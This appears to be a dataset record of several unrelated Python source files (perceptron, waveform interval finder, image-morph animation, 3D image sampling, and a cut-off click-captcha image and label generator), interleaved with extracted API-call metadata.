(["('./part3/%d_%d_' % (m, v) + filename)", 'noisy_image'], {}), "('./part3/%d_%d_' % (m, v) + filename, noisy_image)\n", (1874, 1925), False, 'import cv2\n'), ((2791, 2836), 'numpy.clip', 'np.clip', (['((i / 255.0) ** gamma * 255.0)', '(0)', '(255)'], {}), '((i / 255.0) ** gamma * 255.0, 0, 255)\n', (2798, 2836), True, 'import numpy as np\n')]
''' Author: <NAME> <<EMAIL>> <NAME> <<EMAIL>> ''' import numpy as np class Perceptron: def __init__(self, datapoints, no_of_inputs, threshold=1000, learning_rate=0.0001, isPocket = False): self.threshold = threshold self.learning_rate = learning_rate self.weights = np.random.normal(0, 0.1, no_of_inputs + 1) self.datapoints = datapoints self.isPocket = isPocket def predict(self, inputs): summation = np.dot(inputs, self.weights[1:]) + self.weights[0] if summation > 0: activation = 1 else: activation = 0 return activation def train(self): training_inputs, labels = self.datapoints[:,:-2], self.datapoints[:,-2:-1] misclassified = 1 iteration = 0 while misclassified != 0: misclassified = 0 iteration += 1 for inputs, label in zip(training_inputs, labels): prediction = self.predict(inputs) error_rate = 1 if label == 1 else -1 if (label == 1 and prediction == 0) or (label == -1 and prediction == 1): misclassified += 1 self.weights[1:] += self.learning_rate * error_rate * inputs self.weights[0] += self.learning_rate * error_rate if iteration % 50 == 0: print("Iteration {}, misclassified points {}, Evaluation {}%".format(iteration, misclassified, self.evaluate())) print("") print("======== Result ========= ") print("Iteration {}, misclassified points {}".format(iteration, misclassified)) print("Evaluation {}%".format(self.evaluate())) def evaluate(self): correct = 0 training_inputs, labels = self.datapoints[:,:-2], self.datapoints[:,-2:-1] for inputs, label in zip(training_inputs, labels): prediction = self.predict(inputs) if (label == 1 and prediction == 1) or (label == -1 and prediction == 0): correct += 1 _acc = correct / float(len(training_inputs)) * 100.0 return _acc def printResult(self): print("Weights After Final Iteration: ", np.round(self.weights.transpose(),3)) #print("Accuracy of Pocket: {}%", self.evaluate()) def getInputData(filename): data = np.genfromtxt(filename, delimiter=',') return data if __name__ == '__main__': data_points = np.array(getInputData('classification.txt')) no_of_inputs = 3 pct = Perceptron(data_points, no_of_inputs) pct.train() pct.evaluate() pct.printResult()
[ "numpy.dot", "numpy.genfromtxt", "numpy.random.normal" ]
[((2356, 2394), 'numpy.genfromtxt', 'np.genfromtxt', (['filename'], {'delimiter': '""","""'}), "(filename, delimiter=',')\n", (2369, 2394), True, 'import numpy as np\n'), ((310, 352), 'numpy.random.normal', 'np.random.normal', (['(0)', '(0.1)', '(no_of_inputs + 1)'], {}), '(0, 0.1, no_of_inputs + 1)\n', (326, 352), True, 'import numpy as np\n'), ((475, 507), 'numpy.dot', 'np.dot', (['inputs', 'self.weights[1:]'], {}), '(inputs, self.weights[1:])\n', (481, 507), True, 'import numpy as np\n')]
import numba import numpy as np import pandas as pd from scipy.interpolate import interp1d import strax export, __all__ = strax.exporter(export_self=True) def init_spe_scaling_factor_distributions(file): # Extract the spe pdf from a csv file into a pandas dataframe spe_shapes = pd.read_csv(file) # Create a converter array from uniform random numbers to SPE gains (one interpolator per channel) # Scale the distributions so that they have an SPE mean of 1 and then calculate the cdf uniform_to_pe_arr = [] for ch in spe_shapes.columns[1:]: # skip the first element which is the 'charge' header if spe_shapes[ch].sum() > 0: mean_spe = (spe_shapes['charge'] * spe_shapes[ch]).sum() / spe_shapes[ch].sum() scaled_bins = spe_shapes['charge'] / mean_spe cdf = np.cumsum(spe_shapes[ch]) / np.sum(spe_shapes[ch]) else: # if sum is 0, just make some dummy axes to pass to interpolator cdf = np.linspace(0, 1, 10) scaled_bins = np.zeros_like(cdf) uniform_to_pe_arr.append(interp1d(cdf, scaled_bins)) if uniform_to_pe_arr != []: return uniform_to_pe_arr @export @numba.jit(numba.int32(numba.int64[:], numba.int64, numba.int64, numba.int64[:, :]), nopython=True) def find_intervals_below_threshold(w, threshold, holdoff, result_buffer): """Fills result_buffer with l, r bounds of intervals in w < threshold. :param w: Waveform to do hitfinding in :param threshold: Threshold for including an interval :param result_buffer: numpy N*2 array of ints, will be filled by function. if more than N intervals are found, none past the first N will be processed. :returns : number of intervals processed Boundary indices are inclusive, i.e. the right boundary is the last index which was < threshold """ result_buffer_size = len(result_buffer) last_index_in_w = len(w) - 1 in_interval = False current_interval = 0 current_interval_start = -1 current_interval_end = -1 for i, x in enumerate(w): if x < threshold: if not in_interval: # Start of an interval in_interval = True current_interval_start = i current_interval_end = i if ((i == last_index_in_w and in_interval) or (x >= threshold and i >= current_interval_end + holdoff and in_interval)): # End of the current interval in_interval = False # Add bounds to result buffer result_buffer[current_interval, 0] = current_interval_start result_buffer[current_interval, 1] = current_interval_end current_interval += 1 if current_interval == result_buffer_size: result_buffer[current_interval, 1] = len(w) - 1 n_intervals = current_interval # No +1, as current_interval was incremented also when the last interval closed return n_intervals
[ "numpy.zeros_like", "numpy.sum", "pandas.read_csv", "numba.int32", "numpy.cumsum", "scipy.interpolate.interp1d", "numpy.linspace", "strax.exporter" ]
[((123, 155), 'strax.exporter', 'strax.exporter', ([], {'export_self': '(True)'}), '(export_self=True)\n', (137, 155), False, 'import strax\n'), ((290, 307), 'pandas.read_csv', 'pd.read_csv', (['file'], {}), '(file)\n', (301, 307), True, 'import pandas as pd\n'), ((1205, 1277), 'numba.int32', 'numba.int32', (['numba.int64[:]', 'numba.int64', 'numba.int64', 'numba.int64[:, :]'], {}), '(numba.int64[:], numba.int64, numba.int64, numba.int64[:, :])\n', (1216, 1277), False, 'import numba\n'), ((989, 1010), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(10)'], {}), '(0, 1, 10)\n', (1000, 1010), True, 'import numpy as np\n'), ((1037, 1055), 'numpy.zeros_like', 'np.zeros_like', (['cdf'], {}), '(cdf)\n', (1050, 1055), True, 'import numpy as np\n'), ((1090, 1116), 'scipy.interpolate.interp1d', 'interp1d', (['cdf', 'scaled_bins'], {}), '(cdf, scaled_bins)\n', (1098, 1116), False, 'from scipy.interpolate import interp1d\n'), ((829, 854), 'numpy.cumsum', 'np.cumsum', (['spe_shapes[ch]'], {}), '(spe_shapes[ch])\n', (838, 854), True, 'import numpy as np\n'), ((857, 879), 'numpy.sum', 'np.sum', (['spe_shapes[ch]'], {}), '(spe_shapes[ch])\n', (863, 879), True, 'import numpy as np\n')]
import numpy as np import scipy.linalg as la import matplotlib.pyplot as plt import matplotlib.animation as animation from matplotlib.colors import rgb_to_hsv from imageio import imread from progress.bar import IncrementalBar def grayscale_to_coords(image): """Sorts a grayscale image's pixels by saturation, and returns arrays containing the row and column positions corresponding to sorted order, as well as the sorted intensities as a flattened array.""" rot_image = np.rot90(image,k=-1) rows,cols = np.unravel_index(np.argsort(rot_image,axis=None),shape=rot_image.shape) colors = np.sort(rot_image.flatten()) return rows,cols,colors def color_to_coords(image): """Sorts a color image's pixels by hue, and returns arrays containing the row and column positions corresponding to sorted order, as well as the sorted rgb values as a Nx3 array.""" rot_image = np.rot90(image,k=-1) hue = rgb_to_hsv(rot_image)[:,:,0] mask = np.argsort(hue,axis=None) rows,cols = np.unravel_index(mask,shape=rot_image.shape[:2]) colors = rot_image.reshape((rot_image.shape[0]*rot_image.shape[1],3))[mask] return rows,cols,colors def animate_pixels(imfile1,imfile2,outfile,color=False,verbose=False): """Animates a pixel-motion transition between two images. Images must have the exact same number of pixels. Animation is saved as "outfile". Parameters ---------- imfile1 : str or file object The file name or file object for the first image imfile2 : str or file object The file name or file object for the second image outfile : str The output file name color : bool, optional If True, runs in color mode verbose : bool, optional If True, displays a progress bar in the console """ # Read in images if color: img1 = np.array(imread(imfile1))/255 img2 = np.array(imread(imfile2))/255 else: img1 = np.array(imread(imfile1,as_gray=True))/255 img2 = np.array(imread(imfile2,as_gray=True))/255 # Check number of pixels if img1.shape[0]*img1.shape[1] != img2.shape[0]*img2.shape[1]: raise ValueError("Images must have the name number of pixels") # Sort pixels by saturation (if grayscale) or hue (if color) if verbose: bar1 = IncrementalBar("Sorting\t\t", max=2,suffix='%(percent)d%%') if color: rows1,cols1,colors1 = color_to_coords(img1) else: rows1,cols1,colors1 = grayscale_to_coords(img1) if verbose: bar1.next() if color: rows2,cols2,colors2 = color_to_coords(img2) else: rows2,cols2,colors2 = grayscale_to_coords(img2) if verbose: bar1.next(); bar1.finish() # n is number of frames of one-directional transition # buffer is number of stationary frames before and after the transitions # total is number of frames for two transitions with 2 buffer periods each n=100 buffer = 10 total = 2*n+4*buffer # np.linspace creates evenly spaced position and color arrays for transition if verbose: bar2 = IncrementalBar("Interpolating\t",max=4,suffix='%(percent)d%%') colors = np.linspace(colors1,colors2,n) if verbose: bar2.next() rows = np.linspace(rows1+.5,rows2+.5,n) if verbose: bar2.next() cols = np.linspace(cols1+.5,cols2+.5,n) if verbose: bar2.next() pos = np.dstack((rows,cols)) if verbose: bar2.next(); bar2.finish() # Calculate the aspect ratio of the two images aspect_ratio1 = img1.shape[0]/img1.shape[1] aspect_ratio2 = img2.shape[0]/img2.shape[1] plt.ioff() # Figure will always have default matplotlib 6.4 inch width fig = plt.figure(figsize=(6.4,max(aspect_ratio1,aspect_ratio2)*6.4)) ax = fig.add_subplot(111) ax.set_aspect("equal") plt.axis("off") plt.xlim((0,max(img1.shape[1],img2.shape[1]))) plt.ylim((0,max(img1.shape[0],img2.shape[0]))) # Markers are measured in points, which are 1/72nd of an inch. Calculates # pixel size in points pixels = max(img1.shape[1],img2.shape[1]) pixels_per_inch = pixels/6.4 size = 72/pixels_per_inch # core object is a scatter plot with square markers set to pixel size if color: points = ax.scatter(rows[0],cols[0],c=colors1,marker='s',s=size**2) else: points = ax.scatter(rows[0],cols[0],c=colors1,cmap="gray",marker='s',s=size**2,vmin=0,vmax=1) # update function changes the scatter plot at each frame # set_color works for rgb, set_array works for grayscale def update(j): if j >= buffer and j < buffer+n: i = j-buffer points.set_offsets(pos[i]) if color: points.set_color(colors[i]) else: points.set_array(colors[i]) elif j >= 3*buffer+n and j < 3*buffer+2*n: i = n-(j-(3*buffer+n))-1 points.set_offsets(pos[i]) if color: points.set_color(colors[i]) else: points.set_array(colors[i]) if verbose: bar3.next() if verbose: bar3 = IncrementalBar("Rendering\t",max=total,suffix='%(percent)d%%') # Create FuncAnimation with 60-millisecond inteval between frames ani = animation.FuncAnimation(fig,update,frames=total,interval=60) # Save animation and close the figure ani.save(outfile) if verbose: bar3.next(); bar3.finish() plt.close(fig) plt.ion()
[ "numpy.dstack", "matplotlib.pyplot.ioff", "matplotlib.pyplot.close", "progress.bar.IncrementalBar", "imageio.imread", "numpy.unravel_index", "matplotlib.pyplot.axis", "matplotlib.animation.FuncAnimation", "numpy.argsort", "matplotlib.pyplot.ion", "numpy.rot90", "numpy.linspace", "matplotlib.colors.rgb_to_hsv" ]
[((488, 509), 'numpy.rot90', 'np.rot90', (['image'], {'k': '(-1)'}), '(image, k=-1)\n', (496, 509), True, 'import numpy as np\n'), ((907, 928), 'numpy.rot90', 'np.rot90', (['image'], {'k': '(-1)'}), '(image, k=-1)\n', (915, 928), True, 'import numpy as np\n'), ((978, 1004), 'numpy.argsort', 'np.argsort', (['hue'], {'axis': 'None'}), '(hue, axis=None)\n', (988, 1004), True, 'import numpy as np\n'), ((1020, 1069), 'numpy.unravel_index', 'np.unravel_index', (['mask'], {'shape': 'rot_image.shape[:2]'}), '(mask, shape=rot_image.shape[:2])\n', (1036, 1069), True, 'import numpy as np\n'), ((3132, 3164), 'numpy.linspace', 'np.linspace', (['colors1', 'colors2', 'n'], {}), '(colors1, colors2, n)\n', (3143, 3164), True, 'import numpy as np\n'), ((3202, 3242), 'numpy.linspace', 'np.linspace', (['(rows1 + 0.5)', '(rows2 + 0.5)', 'n'], {}), '(rows1 + 0.5, rows2 + 0.5, n)\n', (3213, 3242), True, 'import numpy as np\n'), ((3274, 3314), 'numpy.linspace', 'np.linspace', (['(cols1 + 0.5)', '(cols2 + 0.5)', 'n'], {}), '(cols1 + 0.5, cols2 + 0.5, n)\n', (3285, 3314), True, 'import numpy as np\n'), ((3345, 3368), 'numpy.dstack', 'np.dstack', (['(rows, cols)'], {}), '((rows, cols))\n', (3354, 3368), True, 'import numpy as np\n'), ((3564, 3574), 'matplotlib.pyplot.ioff', 'plt.ioff', ([], {}), '()\n', (3572, 3574), True, 'import matplotlib.pyplot as plt\n'), ((3773, 3788), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (3781, 3788), True, 'import matplotlib.pyplot as plt\n'), ((5149, 5212), 'matplotlib.animation.FuncAnimation', 'animation.FuncAnimation', (['fig', 'update'], {'frames': 'total', 'interval': '(60)'}), '(fig, update, frames=total, interval=60)\n', (5172, 5212), True, 'import matplotlib.animation as animation\n'), ((5322, 5336), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (5331, 5336), True, 'import matplotlib.pyplot as plt\n'), ((5341, 5350), 'matplotlib.pyplot.ion', 'plt.ion', ([], {}), '()\n', (5348, 5350), True, 'import matplotlib.pyplot as plt\n'), ((542, 574), 'numpy.argsort', 'np.argsort', (['rot_image'], {'axis': 'None'}), '(rot_image, axis=None)\n', (552, 574), True, 'import numpy as np\n'), ((938, 959), 'matplotlib.colors.rgb_to_hsv', 'rgb_to_hsv', (['rot_image'], {}), '(rot_image)\n', (948, 959), False, 'from matplotlib.colors import rgb_to_hsv\n'), ((2322, 2382), 'progress.bar.IncrementalBar', 'IncrementalBar', (['"""Sorting\t\t"""'], {'max': '(2)', 'suffix': '"""%(percent)d%%"""'}), "('Sorting\\t\\t', max=2, suffix='%(percent)d%%')\n", (2336, 2382), False, 'from progress.bar import IncrementalBar\n'), ((3056, 3120), 'progress.bar.IncrementalBar', 'IncrementalBar', (['"""Interpolating\t"""'], {'max': '(4)', 'suffix': '"""%(percent)d%%"""'}), "('Interpolating\\t', max=4, suffix='%(percent)d%%')\n", (3070, 3120), False, 'from progress.bar import IncrementalBar\n'), ((5005, 5069), 'progress.bar.IncrementalBar', 'IncrementalBar', (['"""Rendering\t"""'], {'max': 'total', 'suffix': '"""%(percent)d%%"""'}), "('Rendering\\t', max=total, suffix='%(percent)d%%')\n", (5019, 5069), False, 'from progress.bar import IncrementalBar\n'), ((1873, 1888), 'imageio.imread', 'imread', (['imfile1'], {}), '(imfile1)\n', (1879, 1888), False, 'from imageio import imread\n'), ((1918, 1933), 'imageio.imread', 'imread', (['imfile2'], {}), '(imfile2)\n', (1924, 1933), False, 'from imageio import imread\n'), ((1973, 2002), 'imageio.imread', 'imread', (['imfile1'], {'as_gray': '(True)'}), '(imfile1, as_gray=True)\n', (1979, 2002), False, 'from imageio import imread\n'), ((2031, 2060), 'imageio.imread', 'imread', (['imfile2'], {'as_gray': '(True)'}), '(imfile2, as_gray=True)\n', (2037, 2060), False, 'from imageio import imread\n')]
import numpy as np from joblib import Parallel, delayed from .affine import * from .deformation import * def select_image_samples(image, shape=(64,64,64), n=10, seed=None, with_augmentation=False): """ Select n samples from an image (z,x,y) with the given shape. Returns the sampled positions as (x,y,z) coordinates in image space. Args: image (numpy.array): an 3D image or array of images shape (tuple): the sample shape n (int): the number of samples to be sampled seed (int): a random seed for reproducability of the sampling Returns: (np.array) returns an array of sampled positions """ positions=[] if seed!=None: np.random.seed(seed) if with_augmentation: sp=np.power(shape,2) diagonal=np.ceil(np.sqrt(np.max([sp[0]+sp[1],sp[1]+sp[2],sp[2]+sp[0]]))).astype("uint32") padding=np.ceil(np.max(np.array(diagonal-shape))).astype("uint32") else: padding=0 new_shape=np.array(shape)+2*padding while len(positions) < n: z = np.random.randint(padding,image.shape[0]-new_shape[0]-1) x = np.random.randint(padding,image.shape[1]-new_shape[1]-1) y = np.random.randint(padding,image.shape[2]-new_shape[2]-1) positions.append([z,x,y]) return positions def get_image_samples(image, positions, shape=(64,64,64), with_rotation=False, max_rotations=(90,90,90), order=3, with_deformation=False, max_displacement=20, sigma=3, seed=None, cores=1): """ Extract samples of the given shape from an image (z,x,y) at the given positions. Args: image (numpy.array): an 3D image or array of images shape (tuple): the sample shape positions (np.array): the sample positions Returns: (np.array) returns an array of sampled sub-images """ if order>0: method="linear" else: method="nearest" if seed != None: np.random.seed(seed) if with_rotation or with_deformation: sp=np.power(shape,2) diagonal=np.ceil(np.sqrt(np.max([sp[0]+sp[1],sp[1]+sp[2],sp[2]+sp[0]]))).astype("uint32") padding=np.ceil(np.max(np.array(diagonal-shape))).astype("uint32") else: padding=0 if with_deformation: sample_shape=_crop_sample(image, positions[0], padding, shape).shape deformations=np.array([random_deformation_field(sample_shape, max_displacement, sigma) for i in range(len(positions))]) else: deformations=np.repeat(None,len(positions)) if with_rotation: rotations=np.array([sample_rotation(max_rotations) for i in range(len(positions))]) else: rotations=np.repeat(None,len(positions)) samples=np.array(Parallel(cores)(delayed(_crop_sample)(image,pos,padding,shape) for pos in positions)) samples=np.array(Parallel(cores)(delayed(_create_sample)(sample, shape, padding, rot, deform, order) for sample,rot,deform in zip(samples,rotations,deformations))) if image.shape[-1] == 1: return np.expand_dims(samples, axis=-1) else: return samples def _create_sample(sample, shape, padding=0, rotations=None, deformation=None, order=3): if type(rotations) != type(None): sample=apply_rotation(sample, rotations, order) if type(deformation) != type(None): method = "linear" if order>0 else "nearest" sample=apply_deformation_field(sample, deformation, method) return np.squeeze(sample[padding:padding+shape[0],padding:padding+shape[1],padding:padding+shape[2]]) def _crop_sample(image, position, padding, shape): z,x,y=position return image[(z-padding):z+shape[0]+padding,(x-padding):x+shape[1]+padding,(y-padding):y+shape[2]+padding]
[ "numpy.random.seed", "numpy.power", "numpy.expand_dims", "numpy.max", "numpy.random.randint", "numpy.array", "joblib.Parallel", "numpy.squeeze", "joblib.delayed" ]
[((3458, 3564), 'numpy.squeeze', 'np.squeeze', (['sample[padding:padding + shape[0], padding:padding + shape[1], padding:\n padding + shape[2]]'], {}), '(sample[padding:padding + shape[0], padding:padding + shape[1],\n padding:padding + shape[2]])\n', (3468, 3564), True, 'import numpy as np\n'), ((699, 719), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (713, 719), True, 'import numpy as np\n'), ((757, 775), 'numpy.power', 'np.power', (['shape', '(2)'], {}), '(shape, 2)\n', (765, 775), True, 'import numpy as np\n'), ((990, 1005), 'numpy.array', 'np.array', (['shape'], {}), '(shape)\n', (998, 1005), True, 'import numpy as np\n'), ((1058, 1119), 'numpy.random.randint', 'np.random.randint', (['padding', '(image.shape[0] - new_shape[0] - 1)'], {}), '(padding, image.shape[0] - new_shape[0] - 1)\n', (1075, 1119), True, 'import numpy as np\n'), ((1127, 1188), 'numpy.random.randint', 'np.random.randint', (['padding', '(image.shape[1] - new_shape[1] - 1)'], {}), '(padding, image.shape[1] - new_shape[1] - 1)\n', (1144, 1188), True, 'import numpy as np\n'), ((1196, 1257), 'numpy.random.randint', 'np.random.randint', (['padding', '(image.shape[2] - new_shape[2] - 1)'], {}), '(padding, image.shape[2] - new_shape[2] - 1)\n', (1213, 1257), True, 'import numpy as np\n'), ((1938, 1958), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1952, 1958), True, 'import numpy as np\n'), ((2021, 2039), 'numpy.power', 'np.power', (['shape', '(2)'], {}), '(shape, 2)\n', (2029, 2039), True, 'import numpy as np\n'), ((3033, 3065), 'numpy.expand_dims', 'np.expand_dims', (['samples'], {'axis': '(-1)'}), '(samples, axis=-1)\n', (3047, 3065), True, 'import numpy as np\n'), ((2735, 2750), 'joblib.Parallel', 'Parallel', (['cores'], {}), '(cores)\n', (2743, 2750), False, 'from joblib import Parallel, delayed\n'), ((2842, 2857), 'joblib.Parallel', 'Parallel', (['cores'], {}), '(cores)\n', (2850, 2857), False, 'from joblib import Parallel, delayed\n'), ((2751, 2772), 'joblib.delayed', 'delayed', (['_crop_sample'], {}), '(_crop_sample)\n', (2758, 2772), False, 'from joblib import Parallel, delayed\n'), ((2858, 2881), 'joblib.delayed', 'delayed', (['_create_sample'], {}), '(_create_sample)\n', (2865, 2881), False, 'from joblib import Parallel, delayed\n'), ((808, 861), 'numpy.max', 'np.max', (['[sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]]'], {}), '([sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]])\n', (814, 861), True, 'import numpy as np\n'), ((904, 930), 'numpy.array', 'np.array', (['(diagonal - shape)'], {}), '(diagonal - shape)\n', (912, 930), True, 'import numpy as np\n'), ((2072, 2125), 'numpy.max', 'np.max', (['[sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]]'], {}), '([sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]])\n', (2078, 2125), True, 'import numpy as np\n'), ((2168, 2194), 'numpy.array', 'np.array', (['(diagonal - shape)'], {}), '(diagonal - shape)\n', (2176, 2194), True, 'import numpy as np\n')]
#!/usr/bin/python # -*- coding: UTF-8 -*- import os import time import json import random import numpy as np from jinja2 import Template from PIL import Image, ImageDraw, ImageFont class ConfigError(Exception): pass class ClickCaptcha(object): def __init__(self): # 根目录 self.basedir = os.getcwd() # if not os.path.exists(self.basedir): # os.mkdir(self.basedir) # 图片设置 # self.no_steps = self.height # 渐变迭代次数 self.width = 320 # 宽度 self.height = 160 # 高度 self.mode = "RGB" # 图片生成模式 # 文字设置 self.enable_add_text = True # 目标数量 self.word_count_min = 3 self.word_count_max = 20 self.word_offset = 5 # 字符之间的最小距离 self.width_left_offset = 10 # 字符距离边界的距离 self.width_right_offset = 40 self.height_top_offset = 10 self.height_bottom_offset = 40 # 字体预留 self.word_size = 30 # 字体大小 self.font_path = None self.set_font = None self.word_list_file_path = None self.word_list = None self.location_offset = 0 # 干扰线 self.enable_interference_line = False self.inter_line_min = 10 self.inter_line_max = 16 self.interference_line_width = 3 self.interference_line_radius = (-40, 40) # 虚构文字 self.enable_dummy_word = False self.dummy_word_width = 2 # 虚构文字的线宽度 self.dummy_word_count_min = 3 self.dummy_word_count_max = 5 self.dummy_word_strokes_min = 6 self.dummy_word_strokes_max = 15 self.dummy_word_color = (0, 0, 0) # 图片保存路径 self.enable_save_status = True self.image_postfix = "jpg" self.save_img_dir = os.path.join(self.basedir, "JPEGImages") self.save_label_dir = os.path.join(self.basedir, "Annotations") # 文件配置 self.label_type = "xml" if self.label_type == "json": self.json_pretty = True if self.json_pretty: self.indent = 4 else: self.indent = None elif self.label_type == "xml": self.template_path = "exp.xml" # 内部参数 self.word_point_list = None self.img = None self.draw = None self.word_count = None self.gradient = None self.label_string = None def font_settings(self, word_size=32, font_path=None, word_list_file_path=None): self.word_size = word_size # 字体大小 self.font_path = font_path # 字体路径 self.word_list_file_path = word_list_file_path # 汉字映射 self.location_offset = int(self.word_size // 6) # 字体和字符集 if self.font_path: self.set_font = ImageFont.truetype(self.font_path, self.word_size) # 设置字体 else: raise ConfigError("请指定字体文件的绝对路径或者相对路径,例如:C:/windows/fonts/simkai.ttf") # 字符集路径 if self.word_list_file_path: self.word_list = list() # 字符集:字符集从文件中读取的时候必须是数组形式 with open(self.word_list_file_path, "r", encoding="utf-8") as f: self.word_list = json.load(f) else: raise ConfigError("请指定文字字典文件的绝对路径或者相对路径,例如:data/chinese_word.json") def get_random_word(self): return random.choice(self.word_list) @staticmethod def gen_random_color(): """ 获取随机的一种背景色(去掉了偏黑系颜色) :return: """ a = random.randint(0, 255) b = random.randint(50, 255) c = random.randint(50, 255) return a, b, c @staticmethod def gen_random_line_color(): """ 获取随机的线条颜色 :return: """ a = random.randint(0, 255) b = random.randint(0, 255) c = random.randint(0, 255) return a, b, c @staticmethod def lerp_colour(c1, c2, t): """ 计算每层的渐变色数值 :param c1: :param c2: :param t: :return: """ return int(c1[0] + (c2[0] - c1[0]) * t), int(c1[1] + (c2[1] - c1[1]) * t), int(c1[2] + (c2[2] - c1[2]) * t) def init_gradient(self): """ 生成渐变色列表 :return: """ list_of_colors = [self.gen_random_color(), self.gen_random_color(), self.gen_random_color(), self.gen_random_color()] for i in range(len(list_of_colors) - 2): for j in range(self.height): self.gradient.append(self.lerp_colour(list_of_colors[i], list_of_colors[i + 1], j / self.height)) def init_gradient_image_draw(self): """ 生成一张渐变色背景的图片 :return: """ self.img = Image.new(self.mode, (self.width, self.height), (0, 0, 0)) for i in range(self.height): for j in range(self.width): self.img.putpixel((j, i), self.gradient[j]) self.draw = ImageDraw.Draw(self.img) def generate_random_location(self, i_num): """ 生成一个随机的位置,且判断不与之前的位置重合 :param i_num: :return: """ # print("=== <word index: {}> start generate random location (x, y)".format(i_num)) while True: # print(">>> start judge <<<") judge = [False] * i_num normal = [True] * i_num location_x = random.randint(self.width_left_offset, self.width - self.width_right_offset) location_y = random.randint(self.height_top_offset, self.height - self.height_bottom_offset) # print("word_point_list: {}".format(self.word_point_list)) # print("right now (x, y) -> ({}, {})".format(location_x, location_y)) for index, wp in enumerate(self.word_point_list): x1, y1 = wp if location_x > x1 + self.word_size + self.word_offset: judge[index] = True elif location_x + self.word_size + self.word_offset < x1: judge[index] = True elif location_y > y1 + self.word_size + self.word_offset: judge[index] = True elif location_y + self.word_size + self.word_offset < y1: judge[index] = True else: # print("(x, y)->({}, {}) interference to word_point_list!".format(location_x, location_y)) continue if judge == normal: # print("(x, y) -> ({}, {}) -> pass".format(location_x, location_y)) return location_x, location_y def add_text_to_images(self): """ 添加文字到图片 :return: """ captcha_info = dict() captcha_info["word"] = list() for i in range(0, self.word_count): # 生成随机位置 + 避免互相干扰 location_x, location_y = self.generate_random_location(i) # 对象位置加入到列表 self.word_point_list.append([location_x, location_y]) # 随机选择文字并绘制 word = self.get_random_word() self.draw.text((location_x, location_y), word, font=self.set_font, fill=(0, 0, 0)) w, h = self.draw.textsize(word, self.set_font) info = {"x": location_x, "y": location_y, "w": w, "h": h, "value": word} captcha_info["word"].append(info) captcha_info["word_width"] = self.word_size return captcha_info def add_interference_line(self): """ 添加干扰线 :return: """ num = random.randint(self.inter_line_min, self.inter_line_max) for i in range(num): line_x = random.randint(self.width_left_offset, self.width - self.width_right_offset) line_y = random.randint(self.height_top_offset, self.height - self.height_bottom_offset) line_x_offset = random.randint(*self.interference_line_radius) line_y_offset = random.randint(*self.interference_line_radius) start_point = (line_x, line_y) end_point = (line_x + line_x_offset, line_y + line_y_offset) self.draw.line([start_point, end_point], self.gen_random_line_color(), width=self.interference_line_width) return self.draw def add_dummy_word(self): """ 添加虚拟文字 :return: """ # 虚构文字数量 captcha_info = dict() captcha_info["dummy"] = list() num_a = random.randint(self.dummy_word_count_min, self.dummy_word_count_max) for i in range(num_a): # 虚构文字笔画数 num_b = random.randint(self.dummy_word_strokes_min, self.dummy_word_strokes_max) # 生成随机位置+避免互相干扰 location_x, location_y = self.generate_random_location(i + self.word_count) self.word_point_list.append([location_x, location_y]) # 确定位置后开始生成坐标 bx = random.randint(location_x, location_x + self.word_size) # x' by = random.randint(location_y, location_y + self.word_size) # y' line_x_end = location_x + self.word_size # x + 20 line_y_end = location_y + self.word_size # y + 20 a = (bx, location_y) b = (line_x_end, by) c = (bx, line_y_end) d = (location_x, by) for j in range(num_b): draw_type = random.randint(1, 6) if draw_type == 1: self.draw.line([a, b], self.dummy_word_color, width=self.dummy_word_width) elif draw_type == 2: self.draw.line([a, c], self.dummy_word_color, width=self.dummy_word_width) elif draw_type == 3: self.draw.line([a, d], self.dummy_word_color, width=self.dummy_word_width) elif draw_type == 4: self.draw.line([b, c], self.dummy_word_color, width=self.dummy_word_width) elif draw_type == 5: self.draw.line([b, d], self.dummy_word_color, width=self.dummy_word_width) else: # this is 6 type self.draw.line([c, d], self.dummy_word_color, width=self.dummy_word_width) info = {"x": location_x, "y": location_y, "value": "dummy"} captcha_info["dummy"].append(info) return captcha_info def save_this_image(self, order_num): """ 保存图片和标签 :param order_num: :return: """ tc = str(time.time()).replace(".", "") # 图片 img_file = "{}_{}.{}".format(order_num, tc, self.image_postfix) img_path = os.path.join(self.save_img_dir, img_file) self.img.save(img_path) # 标签 label_file = "{}_{}.{}".format(order_num, tc, self.label_type) label_path = os.path.join(self.save_label_dir, label_file) if self.label_type == "json": with open(label_path, "w", encoding="utf-8") as f: content = json.dumps(self.label_string, ensure_ascii=False, indent=4) f.write(content) elif self.label_type == "xml": self.render_xml_template(img_file, img_path, label_path) def render_xml_template(self, img_file, img_path, save_path): xml_data = dict() xml_data["words"] = list() xml_data["dummy_words"] = list() xml_data["img_path"] = os.path.join(self.basedir, img_path) xml_data["img_name"] = img_file xml_data["folder_name"] = self.save_label_dir.split("/")[-1] xml_data["width"] = self.width xml_data["height"] = self.height if self.label_string.get("word", None): for w in self.label_string["word"]: item = dict() item["xmin"] = w["x"] item["xmax"] = w["x"] + w["w"] item["ymin"] = w["y"] + self.location_offset item["ymax"] = w["y"] + w["h"] item["label"] = w["value"] xml_data["words"].append(item) if self.label_string.get("dummy", None): for w in self.label_string["dummy"]: item = dict() item["xmin"] = w["x"] - self.dummy_word_width item["xmax"] = w["x"] + self.word_size + self.dummy_word_width item["ymin"] = w["y"] - self.dummy_word_width item["ymax"] = w["y"] + self.word_size + self.dummy_word_width xml_data["dummy_words"].append(item) with open(self.template_path, "r", encoding="utf-8") as f: before_data = f.read() t = Template(before_data) with open(save_path, 'w', encoding="utf-8") as f: after_data = t.render(xml_data) f.write(after_data) def create_image(self, order_num=0): """ 根据配置生成一张图片 :param order_num:序号 :return: """ if not self.set_font: raise ConfigError("请先设置字体") print("\n--------------------- Generate picture <{}> -----------------------: ".format(order_num)) # 初始化绘画对象和所有对象的位置 self.gradient = list() self.init_gradient() self.init_gradient_image_draw() self.word_point_list = [] self.word_count = random.randint(self.word_count_min, self.word_count_max) # 添加文字 if self.enable_add_text: captcha_info = self.add_text_to_images() self.label_string = captcha_info # 创建干扰线 if self.enable_interference_line: self.add_interference_line() 